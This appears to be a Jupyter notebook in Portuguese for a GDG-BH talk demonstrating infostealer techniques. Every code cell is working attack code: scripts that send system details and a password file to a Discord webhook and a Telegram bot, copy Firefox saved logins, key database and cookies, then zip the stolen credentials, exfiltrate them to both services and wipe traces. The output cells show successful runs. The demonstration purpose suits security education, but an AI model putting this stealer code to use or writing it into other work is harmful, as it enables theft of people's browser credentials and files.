## Demonstração GDG-BH

1. Exfiltração de arquivos via webhook - discord
2. Exfiltração de arquivos via bot - telegram
3. Extração de credenciais do navegador
4. Extração + compactação + envio discord + envio telegram

In [ ]:
# Exfiltração de arquivos via discord
import requests
import os
import platform

# 1. Configuração do Webhook (Cole sua URL aqui)
WEBHOOK_URL = "URL_WEBHOOK_DISCORD"

# 2. Coleta de Informações Básicas do Sistema
def collect_system_info():
    data = {
        "user": os.getlogin(),
        "ip": requests.get('https://api.ipify.org').text, # Busca IP externo real
        "os": f"{platform.system()} {platform.release()}"
    }
    return data

# 3. Exfiltração via Discord
def exfiltrate():
    info = collect_system_info()
    
    # Mensagem de Alerta (Embed)
    payload = {
        "embeds": [{
            "title": "⚡ Nova Vítima Infectada",
            "color": 15158332, # Vermelho
            "fields": [
                {"name": "Usuário", "value": info['user'], "inline": True},
                {"name": "IP", "value": info['ip'], "inline": True},
                {"name": "S.O", "value": info['os'], "inline": False}
            ]
        }]
    }
    
    # Envia o Resumo
    requests.post(WEBHOOK_URL, json=payload)

    # Envia o Arquivo "Roubado"
    file_path = "senhas_banco.txt"
    if os.path.exists(file_path):
        with open(file_path, 'rb') as f:
            requests.post(WEBHOOK_URL, files={'file': f})

if __name__ == "__main__":
    exfiltrate()

In [ ]:
# exfiltração de arquivos via telegram
import requests
import os

# 1. Credenciais obtidas via BotFather
TOKEN = "SEU_TOKEN"
CHAT_ID = "CHAT_ID"

def exfiltrar_telegram(caminho_arquivo):
    url = f"https://api.telegram.org/bot{TOKEN}/sendDocument"
    
    # Verificação de segurança da demo
    if not os.path.exists(caminho_arquivo):
        print(f"Erro: Arquivo {caminho_arquivo} não encontrado.")
        return

    # Payload e Arquivo
    payload = {
        "chat_id": CHAT_ID,
        "caption": "⚡ Novo Log de Vítima: Exfiltração via Telegram"
    }
    
    with open(caminho_arquivo, 'rb') as f:
        files = {"document": f}
        # O malware faz um POST request para os servidores do Telegram
        response = requests.post(url, data=payload, files=files)
        
    if response.status_code == 200:
        print("✅ Sucesso: Arquivo exfiltrado para o bot do atacante.")
    else:
        print(f"❌ Falha: Status {response.status_code}")

if __name__ == "__main__":
    # Simulação: Enviando o arquivo de senhas
    exfiltrar_telegram("senhas_banco.txt")

✅ Sucesso: Arquivo exfiltrado para o bot do atacante.


In [9]:
import os
import shutil
from pathlib import Path

def coletar_arquivos_firefox():
    # Caminho padrão do Firefox no Windows
    appdata = os.getenv('APPDATA')
    firefox_path = Path(appdata) / "Mozilla" / "Firefox" / "Profiles"
    
    if not firefox_path.exists():
        print("[-] Firefox não encontrado ou perfil não localizado.")
        return

    # Infostealers buscam por perfis ativos (geralmente terminam em '.default-release')
    for profile in firefox_path.iterdir():
        print(f"[*] Analisando perfil: {profile.name}")
        
        # Arquivos críticos para extração de senhas e cookies
        arquivos_alvo = ["logins.json", "key4.db", "cookies.sqlite"]
        
        # Criar pasta temporária para o "dump"
        temp_dir = Path(os.getenv('TEMP')) / "fx_dump"
        temp_dir.mkdir(exist_ok=True)

        for arquivo in arquivos_alvo:
            caminho_origem = profile / arquivo
            if caminho_origem.exists():
                shutil.copy(caminho_origem, temp_dir / f"{profile.name}_{arquivo}")
                print(f"[+] Arquivo {arquivo} coletado com sucesso.")

    print(f"\n[!] Arquivos prontos para exfiltração em: {temp_dir}")

if __name__ == "__main__":
    coletar_arquivos_firefox()

[*] Analisando perfil: 9dpmkdjl.default
[*] Analisando perfil: bsnfj44r.default-release
[+] Arquivo logins.json coletado com sucesso.
[+] Arquivo key4.db coletado com sucesso.
[+] Arquivo cookies.sqlite coletado com sucesso.

[!] Arquivos prontos para exfiltração em: C:\Users\lucas\AppData\Local\Temp\fx_dump


In [ ]:
import os
import shutil
import zipfile
import requests
from pathlib import Path

# --- CONFIGURAÇÕES ---
TELEGRAM_TOKEN = "SEU_TOKEN"
TELEGRAM_CHAT_ID = "CHAT_ID"
DISCORD_WEBHOOK = "URL_WEBHOOK_DISCORD"

def compactar_diretorio(diretorio_origem, arquivo_saida):
    """Compacta os logs coletados em um arquivo .zip"""
    with zipfile.ZipFile(arquivo_saida, 'w', zipfile.ZIP_DEFLATED) as zipf:
        for raiz, dirs, arquivos in os.walk(diretorio_origem):
            for arquivo in arquivos:
                zipf.write(os.path.join(raiz, arquivo), arquivo)

def enviar_telegram(caminho_arquivo):
    """Exfiltração via Telegram API"""
    url = f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/sendDocument"
    payload = {"chat_id": TELEGRAM_CHAT_ID, "caption": "⚡ Novo Log: Firefox (Full Dump)"}
    with open(caminho_arquivo, 'rb') as f:
        requests.post(url, data=payload, files={"document": f})

def enviar_discord(caminho_arquivo):
    """Exfiltração via Discord Webhook"""
    payload = {"content": "🚨 **Alerta de Infostealer**: Arquivos de credenciais recebidos."}
    with open(caminho_arquivo, 'rb') as f:
        requests.post(DISCORD_WEBHOOK, data=payload, files={"file": f})

def executar_stealer():
    # 1. Preparar pastas
    temp_dir = Path(os.getenv('TEMP')) / "browser_logs"
    temp_dir.mkdir(exist_ok=True)
    zip_path = Path(os.getenv('TEMP')) / "logs_exfiltracao.zip"

    # 2. Coleta
    appdata = os.getenv('APPDATA')
    ff_path = Path(appdata) / "Mozilla" / "Firefox" / "Profiles"
    
    if ff_path.exists():
        for profile in ff_path.iterdir():
            for target in ["logins.json", "key4.db"]:
                if (profile / target).exists():
                    shutil.copy(profile / target, temp_dir / f"{profile.name}_{target}")

    # 3. Compactação e Envio
    if any(temp_dir.iterdir()):
        compactar_diretorio(temp_dir, zip_path)
        
        print("[*] Iniciando exfiltração dupla...")
        enviar_telegram(zip_path)
        enviar_discord(zip_path)
        print("[+] Dados enviados com sucesso.")

        # Limpeza de rastros (Opcional na demo)
        os.remove(zip_path)
        shutil.rmtree(temp_dir)

if __name__ == "__main__":
    executar_stealer()

[*] Iniciando exfiltração dupla...
[+] Dados enviados com sucesso.
